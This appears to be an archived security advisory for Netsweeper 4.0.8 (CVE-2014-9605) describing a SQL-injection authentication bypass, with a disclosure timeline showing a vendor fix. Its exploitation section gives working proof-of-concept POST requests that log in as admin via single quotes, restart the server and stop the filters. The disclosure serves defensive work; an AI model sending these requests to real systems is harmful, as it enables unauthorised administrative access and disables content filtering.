Skip to content
cyberexploits
webappphptext

Netsweeper 4.0.8 - SQL Injection Authentication Bypass

Netsweeper 4.0.8 - SQL Injection Authentication Bypass

Publié le 2015-08-21

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/37928.txt7eac4c3a
raw
+----------------------------------------------------------------+

+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +

+----------------------------------------------------------------+

Affected Product: Netsweeper

Vendor Homepage : www.netsweeper.com/

Version 	: 4.0.8 (and probably other versions)

Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

Patched      	: Yes

CVE		: CVE-2014-9605



+---------------------+

+ Product Description +

+---------------------+

Netsweeper is a software solution specialized in content filtering.



+----------------------+

+ Exploitation Details +

+----------------------+

By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:

	i)   "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)

	ii)  "Restart" the server

	iii) "Stop the filters on the server"



Vulnerability Type: Authentication Bypass (using two single-quotes)

p0c: 	http://netsweeper/webupgrade/webupgrade.php

	POST: step=&login='&password='&show_advanced_output=                



p0c restart the server:

	http://netsweeper/webupgrade/webupgrade.php

	POST: step=12&login='&password='&show_advanced_output=

		

	followed by



	http://netsweeper/webupgrade/webupgrade.php HTTP/1.1

	POST: step=12&restart=yes&show_advanced_output=false



p0c stop the filters on the server:

	http://netsweeper/webupgrade/webupgrade.php

	POST: step=9&stopservices=yes&show_advanced_output=



+----------+

+ Solution +

+----------+

Upgrade to latest version.



+---------------------+

+ Disclosure Timeline +

+---------------------+

24-Nov-2014: Initial Communication

03-Dec-2014: Netsweeper responded

03-Dec-2014: Shared full details to replicate the issue

10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2

17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public

18-Dec-2014: Confirm fix

17-Jan-2015: CVE assigned CVE-2014-9605

11-Aug-2015: Public disclosure

Voir sur GitHub